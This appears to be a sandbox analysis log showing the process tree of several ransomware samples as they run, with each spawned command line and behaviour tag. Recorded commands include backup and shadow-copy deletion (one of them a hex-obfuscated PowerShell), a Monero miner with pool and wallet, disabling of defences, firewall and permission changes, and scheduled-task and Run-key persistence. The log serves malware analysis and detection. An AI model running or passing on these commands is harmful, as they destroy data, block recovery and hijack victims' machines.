C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:956
-
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4872 -
C:\Users\Admin\AppData\Roaming\Defender.exe"C:\Users\Admin\AppData\Roaming\Defender.exe"4⤵PID:4736
-
C:\WINDOWS\explorer.exeC:\WINDOWS\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.2miners.com:2222 --user=46UvnmBZBzLCi3SynE1oYNJNfDAyYoYJFcwpJHH1XB6yAKd6bi7PuizHttyP6eiWbxVt11gWsk7mDPEtVBPBN4f36gZc8Wh --pass= --cpu-max-threads-hint=20 --donate-level=5 --unam-idle-wait=15 --unam-idle-cpu=405⤵PID:14092
-
-
-
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Users\Admin\AppData\Roaming\System64.exe"C:\Users\Admin\AppData\Roaming\System64.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4412 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\System64.exe" "System64.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1692
-
-
-
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fb81347ec3a8abc5259abd425aa435ab166eb69a5c76baef19ae23f6455c1484.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-fb81347ec3a8abc5259abd425aa435ab166eb69a5c76baef19ae23f6455c1484.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2876 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rokqusi5\rokqusi5.cmdline"4⤵PID:5188
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5BA.tmp" "c:\Users\Admin\AppData\Local\Temp\rokqusi5\CSC91A41F053C7A4BD29B94A299A0D0914A.TMP"5⤵PID:12916
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk4⤵PID:13080
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled4⤵
- Launches sc.exe
PID:12856
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk4⤵PID:9248
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk4⤵PID:10132
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk4⤵PID:16872
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵
- Launches sc.exe
PID:16512
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk4⤵PID:16580
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk4⤵PID:12496
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLWriter start= disabled4⤵
- Launches sc.exe
PID:2608
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance4⤵PID:9244
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5372
-
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SstpSvc start= disabled4⤵
- Launches sc.exe
PID:8972
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config MBAMService start= disabled4⤵
- Launches sc.exe
PID:14232
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled4⤵
- Command and Scripting Interpreter: PowerShell
PID:10664
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin4⤵PID:4720
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin4⤵PID:9992
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config fdPHost start= auto4⤵
- Launches sc.exe
PID:8760
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config FDResPub start= auto4⤵
- Launches sc.exe
PID:10972
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SSDPSRV start= auto4⤵
- Launches sc.exe
PID:14536
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config Dnscache start= auto4⤵
- Launches sc.exe
PID:5344
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config upnphost start= auto4⤵
- Launches sc.exe
PID:15884
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes4⤵
- Modifies Windows Firewall
PID:17364
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes4⤵
- Modifies Windows Firewall
PID:11968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol4⤵PID:5836
-
C:\Users\Admin\AppData\Local\Temp\B2CF781D-9998-4BAF-AC1A-0330F06674CD\dismhost.exeC:\Users\Admin\AppData\Local\Temp\B2CF781D-9998-4BAF-AC1A-0330F06674CD\dismhost.exe {0A2295AF-4ABD-4D01-80E9-68F30924A242}5⤵PID:14268
-
-
-
C:\Windows\SysWOW64\mountvol.exe"mountvol.exe"4⤵PID:10080
-
-
C:\Windows\SysWOW64\mountvol.exe"C:\Windows\System32\mountvol.exe" A: \\?\Volume{62c5c1e3-0000-0000-0000-100000000000}\4⤵PID:15136
-
-
C:\Windows\SysWOW64\mountvol.exe"C:\Windows\System32\mountvol.exe" B: \\?\Volume{62c5c1e3-0000-0000-0000-d01200000000}\4⤵PID:11060
-
-
C:\Windows\SysWOW64\mountvol.exe"C:\Windows\System32\mountvol.exe" E: \\?\Volume{62c5c1e3-0000-0000-0000-f0ff3a000000}\4⤵PID:11188
-
-
C:\Windows\SysWOW64\mountvol.exe"C:\Windows\System32\mountvol.exe" G: \\?\Volume{86ca1acd-84cf-11ef-adde-806e6f6e6963}\4⤵PID:7980
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:11460
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:5552
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:12752
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a4⤵
- Network Service Discovery
PID:2824
-
-
C:\Windows\SysWOW64\net.exe"net.exe" view4⤵
- Discovers systems in the same network
PID:6916
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\net.exe" use \\10.127.0.1024⤵PID:15924
-
-
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Foreign.gen-f0c73e683743fcaf091322ee875d7bd76475adfb86d80af384d809177b945696.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-f0c73e683743fcaf091322ee875d7bd76475adfb86d80af384d809177b945696.exe3⤵
- Executes dropped EXE
PID:3228
-
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exeHEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File1.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File1.exe"5⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
PID:3440
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File2.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Defender" /tr '"C:\Users\Admin\AppData\Roaming\Windows Defender"' & exit6⤵PID:4596
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Windows Defender" /tr '"C:\Users\Admin\AppData\Roaming\Windows Defender"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:2456
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
PID:5484
-
-
-
-
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4644
-
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1af0659e1375552c88339146c38d870f9808fd4bfcf93d026aa0698aa89cdf23.exeHEUR-Trojan-Ransom.Win32.GandCrypt.gen-1af0659e1375552c88339146c38d870f9808fd4bfcf93d026aa0698aa89cdf23.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2276 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 4084⤵
- Program crash
PID:2388
-
-
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exeHEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1052
-
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive4⤵
- System Location Discovery: System Language Discovery
PID:4948
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive4⤵
- System Location Discovery: System Language Discovery
PID:5372
-
-
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.Stop.gen-8a9aa2c6397edec14772b76171a223259ec3190e3cef4cf6774d2eb9435a30f6.exeHEUR-Trojan-Ransom.Win32.Stop.gen-8a9aa2c6397edec14772b76171a223259ec3190e3cef4cf6774d2eb9435a30f6.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1600 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\Desktop\00436\HED62F~1.DLL,Z C:\Users\Admin\Desktop\00436\HED62F~1.EXE4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:640 -
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\Desktop\00436\HED62F~1.DLL,hF8l5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3688
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 5204⤵
- Program crash
PID:2388
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Bitman.aiyl-33265f47eeaf55e96e5e3c3bf600c585dfc1a3c9562e8891342956a6c033d2c1.exeTrojan-Ransom.Win32.Bitman.aiyl-33265f47eeaf55e96e5e3c3bf600c585dfc1a3c9562e8891342956a6c033d2c1.exe3⤵
- Checks computer location settings
- Executes dropped EXE
PID:4292 -
C:\Windows\Temp\KA57j.exe"C:\Windows\Temp\KA57j.exe" C:\Windows\Temp\KA57j.sys4⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:6128
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exeTrojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Users\Admin\AppData\Roaming\ddd.exe"C:\Users\Admin\AppData\Roaming\ddd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4512 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8445⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exeTrojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Suspicious use of SetWindowsHookEx
PID:2036 -
C:\Windows\xk.exeC:\Windows\xk.exe4⤵PID:2852
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵PID:1212
-
-
C:\Windows\xk.exeC:\Windows\xk.exe4⤵PID:15344
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵PID:3900
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵PID:12092
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵PID:12020
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵PID:5756
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵PID:15044
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵PID:9224
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Blocker.nage-ebe3c86f238c4b3cbe2d52e93471c1ca94cb7c9d449108300294256e837a71a9.exeTrojan-Ransom.Win32.Blocker.nage-ebe3c86f238c4b3cbe2d52e93471c1ca94cb7c9d449108300294256e837a71a9.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4136 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\zapuskbezcmd.vbs"4⤵PID:13080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c windows.exe5⤵PID:9524
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\windows.exewindows.exe6⤵PID:13228
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\windows.exewindows.exe7⤵PID:11164
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe""8⤵PID:13092
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Windows Explorer.exe"9⤵
- Modifies registry key
PID:13328
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\sound.vbs"4⤵PID:10104
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Cryptor.eev-89cc8fa7a2d2fef1b7e292682121cc65dedb8e0d5cd926977dfae49f25410f4c.exeTrojan-Ransom.Win32.Cryptor.eev-89cc8fa7a2d2fef1b7e292682121cc65dedb8e0d5cd926977dfae49f25410f4c.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:64
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exeTrojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5316
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exeTrojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5592 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8E7F.tmp\8E80.tmp\8E81.bat C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exe"4⤵PID:5788
-
C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"5⤵PID:5364
-
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
PID:5456
-
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exeTrojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5960 -
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exeTrojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe4⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:6048 -
C:\Users\Admin\K-37763-383-2847-00\winsrc.exe"C:\Users\Admin\K-37763-383-2847-00\winsrc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1532 -
C:\Users\Admin\K-37763-383-2847-00\winsrc.exe"C:\Users\Admin\K-37763-383-2847-00\winsrc.exe"6⤵
- Executes dropped EXE
PID:3628
-
-
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.GandCrypt.abw-9becd904847b2dabd1a03df45210d7233fdda9927eac6d87c75bab53947ce5f1.exeTrojan-Ransom.Win32.GandCrypt.abw-9becd904847b2dabd1a03df45210d7233fdda9927eac6d87c75bab53947ce5f1.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:224 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 5404⤵
- Program crash
PID:5268
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Gen.abhj-633267a15766e9e6ac4dc3e2f3ea2e66b5146eb0e8980cf70f4bd2786680d573.exeTrojan-Ransom.Win32.Gen.abhj-633267a15766e9e6ac4dc3e2f3ea2e66b5146eb0e8980cf70f4bd2786680d573.exe3⤵
- Executes dropped EXE
PID:5328 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AC87.tmp\AC88.tmp\AC89.bat C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Gen.abhj-633267a15766e9e6ac4dc3e2f3ea2e66b5146eb0e8980cf70f4bd2786680d573.exe"4⤵PID:5072
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.GenericCryptor.cys-6455923a0d65f856c93c8d5262315527fef93cf18ea88761146d55d8236445d6.exeTrojan-Ransom.Win32.GenericCryptor.cys-6455923a0d65f856c93c8d5262315527fef93cf18ea88761146d55d8236445d6.exe3⤵PID:4332
-
C:\Users\Admin\AppData\Local\Temp\sudyr.exe"C:\Users\Admin\AppData\Local\Temp\sudyr.exe"4⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\yzkod.exe"C:\Users\Admin\AppData\Local\Temp\yzkod.exe"5⤵PID:9064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "4⤵PID:1884
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Phpw.afp-3bf317c5fa28919bd9620f5a59ad3a418a6da5e28b64d785f8f429fe8a03b236.exeTrojan-Ransom.Win32.Phpw.afp-3bf317c5fa28919bd9620f5a59ad3a418a6da5e28b64d785f8f429fe8a03b236.exe3⤵PID:5492
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:15020
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Local\Temp\Update.exe"' & exit5⤵PID:10976
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Local\Temp\Update.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:17176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8B2F.tmp.bat""5⤵PID:16860
-
C:\Windows\SysWOW64\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:15864
-
-
C:\Users\Admin\AppData\Local\Temp\Update.exe"C:\Users\Admin\AppData\Local\Temp\Update.exe"6⤵PID:12852
-
-
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Shade.oag-9d0cede51ac13eb7ec45379249054e27584a1ad208766035b84fe165da29f9d1.exeTrojan-Ransom.Win32.Shade.oag-9d0cede51ac13eb7ec45379249054e27584a1ad208766035b84fe165da29f9d1.exe3⤵PID:2092
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Sodin.agr-8bd2067d088dad4df24e11244f5b72ce1fd22b686e2ce9ba6ee8711f8f6a836d.exeTrojan-Ransom.Win32.Sodin.agr-8bd2067d088dad4df24e11244f5b72ce1fd22b686e2ce9ba6ee8711f8f6a836d.exe3⤵PID:6036
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\MsMpEng.exe4⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\MsMpEng.exeC:\Users\Admin\AppData\Local\Temp\MsMpEng.exe5⤵PID:10556
-
-
-
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Wanna.araw-22eccaf0437a2e793d02ec892fb77d2d8ca7da77084177883474f3a020efc058.exeTrojan-Ransom.Win32.Wanna.araw-22eccaf0437a2e793d02ec892fb77d2d8ca7da77084177883474f3a020efc058.exe3⤵PID:1668
-
C:\Windows\SysWOW64\attrib.exeattrib +h .4⤵
- Views/modifies file attributes
PID:13836
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:13828
-
-
C:\Users\Admin\Desktop\00436\taskdl.exetaskdl.exe4⤵PID:14108
-
-
